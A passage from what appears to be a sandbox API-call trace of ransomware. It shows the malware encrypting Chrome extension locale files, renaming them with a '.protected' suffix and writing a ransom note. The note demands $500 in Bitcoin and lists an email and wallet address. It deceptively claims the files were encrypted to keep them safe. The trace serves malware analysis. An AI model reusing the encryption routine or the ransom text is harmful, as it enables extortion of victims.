| out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.454] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.455] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.455] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.455] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.455] CloseHandle (hObject=0x164) returned 1 [0079.455] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.455] lstrcmpiW (lpString1="pt_PT", lpString2="Windows") returned -1 [0079.455] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files") returned 1 [0079.455] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files (x86)") returned 1 [0079.455] lstrcmpiW (lpString1="pt_PT", lpString2="$Recycle.bin") returned 1 [0079.455] lstrcmpiW (lpString1="pt_PT", lpString2="System Volume Information") returned -1 [0079.455] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT") returned 145 [0079.455] lstrcmpW (lpString1="pt_PT", lpString2=".") returned 1 [0079.455] lstrcmpW (lpString1="pt_PT", lpString2="..") returned 1 [0079.455] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\*") returned 147 [0079.455] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.456] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.456] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.456] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.456] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.456] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.456] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\.") returned 147 [0079.456] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.456] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.456] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.456] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.456] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.456] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.456] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.456] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\..") returned 148 [0079.456] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.456] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.456] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.456] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.456] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.456] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.456] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.456] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.456] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json") returned 159 [0079.456] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.456] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.456] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.456] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.456] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.457] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json") returned 159 [0079.457] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.457] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json") returned 159 [0079.457] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.457] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json") returned 159 [0079.457] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.457] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x108, lpOverlapped=0x0) returned 1 [0079.458] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.458] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x108, lpOverlapped=0x0) returned 1 [0079.458] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.458] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.459] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.459] CloseHandle (hObject=0x168) returned 1 [0079.459] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json.protected") returned 169 [0079.459] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_pt\\messages.json.protected")) returned 1 [0079.460] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.460] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.460] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\RESTORE_FILES.txt") returned 163 [0079.460] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_pt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.460] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.460] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.461] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.461] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.461] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.461] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.461] CloseHandle (hObject=0x164) returned 1 [0079.461] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.461] lstrcmpiW (lpString1="ro", lpString2="Windows") returned -1 [0079.462] lstrcmpiW (lpString1="ro", lpString2="Program Files") returned 1 [0079.462] lstrcmpiW (lpString1="ro", lpString2="Program Files (x86)") returned 1 [0079.462] lstrcmpiW (lpString1="ro", lpString2="$Recycle.bin") returned 1 [0079.462] lstrcmpiW (lpString1="ro", lpString2="System Volume Information") returned -1 [0079.462] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro") returned 142 [0079.462] lstrcmpW (lpString1="ro", lpString2=".") returned 1 [0079.462] lstrcmpW (lpString1="ro", lpString2="..") returned 1 [0079.462] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\*") returned 144 [0079.462] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.462] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.462] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.462] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.462] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.462] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.462] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\.") returned 144 [0079.462] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.462] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.462] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.462] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.462] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.462] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.462] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.462] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\..") returned 145 [0079.462] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.463] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.463] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.463] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.463] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.463] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.463] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.463] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.463] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json") returned 156 [0079.463] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.463] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.463] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.463] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.463] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.464] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json") returned 156 [0079.464] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.464] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json") returned 156 [0079.464] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.464] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json") returned 156 [0079.464] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.464] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x119, lpOverlapped=0x0) returned 1 [0079.465] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffee7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.465] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x119, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x119, lpOverlapped=0x0) returned 1 [0079.466] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.466] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.466] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.466] CloseHandle (hObject=0x168) returned 1 [0079.466] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json.protected") returned 166 [0079.466] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json.protected")) returned 1 [0079.467] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.467] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.467] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\RESTORE_FILES.txt") returned 160 [0079.467] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.468] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.468] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.468] lstrlenA 